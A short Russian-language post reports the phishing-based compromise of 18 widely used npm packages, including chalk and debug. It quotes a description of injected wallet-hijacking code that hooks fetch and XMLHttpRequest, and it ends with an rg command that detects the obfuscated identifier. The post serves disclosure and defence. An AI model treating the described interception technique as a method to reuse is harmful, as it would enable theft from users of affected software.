Тут опять NPM поломали *Starting at September 8th, 13:16 UTC, our Aikido intel feed alerted us to a series packages being pushed to npm, which appeared to contains malicious code

Тут опять NPM поломали

*Starting at September 8th, 13:16 UTC, our Aikido intel feed alerted us to a series packages being pushed to npm, which appeared to contains malicious code. These were 18 very popular packages,

backslash (0.26m downloads per week) chalk-template (3.9m downloads per week) supports-hyperlinks (19.2m downloads per week) has-ansi (12.1m downloads per week) simple-swizzle (26.26m downloads per week) color-string (27.48m downloads per week) error-ex (47.17m downloads per week) color-name (191.71m downloads per week) is-arrayish (73.8m downloads per week) slice-ansi (59.8m downloads per week) color-convert (193.5m downloads per week) wrap-ansi (197.99m downloads per week) ansi-regex (243.64m downloads per week) supports-color (287.1m downloads per week) strip-ansi (261.17m downloads per week) chalk (299.99m downloads per week) debug (357.6m downloads per week) ansi-styles (371.41m downloads per week)

All together, these packages have more than 2 billion downloads per week.* npm debug and chalk packages compromised https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

Был подсунут обфусцированный код, который перехватывал трафик

This malware is essentially a browser-based interceptor that hijacks both network traffic and application APIs. It injects itself into functions like fetch, XMLHttpRequest, and common wallet interfaces, then silently rewrites values in requests and responses.

Украли доступ через фишинг у одного мантейнера https://bsky.app/profile/bad-at-computer.bsky.social/post/3lydje4zqis2y

В статье утверждается, что похожей атаке подвергся и мантейнер других пакетов

Таблицу с версиями пакетов прикрепил к посту

Дополнительные ссылки почитать

We Just Found Malicious Code in the Popular NPM Package https://jdstaerk.substack.com/p/we-just-found-malicious-code-in-the

https://news.ycombinator.com/item?id=45169657

npm Author Qix Compromised via Phishing Email in Major Supply Chain Attack https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack

Issue https://github.com/chalk/chalk/issues/656 https://github.com/debug-js/debug/issues/1005#issuecomment-3266885191

Что бы проверить нет ли в ваших зависимостях гадости

$ rg -uu --max-columns=80 --glob '*.js' _0x112fa8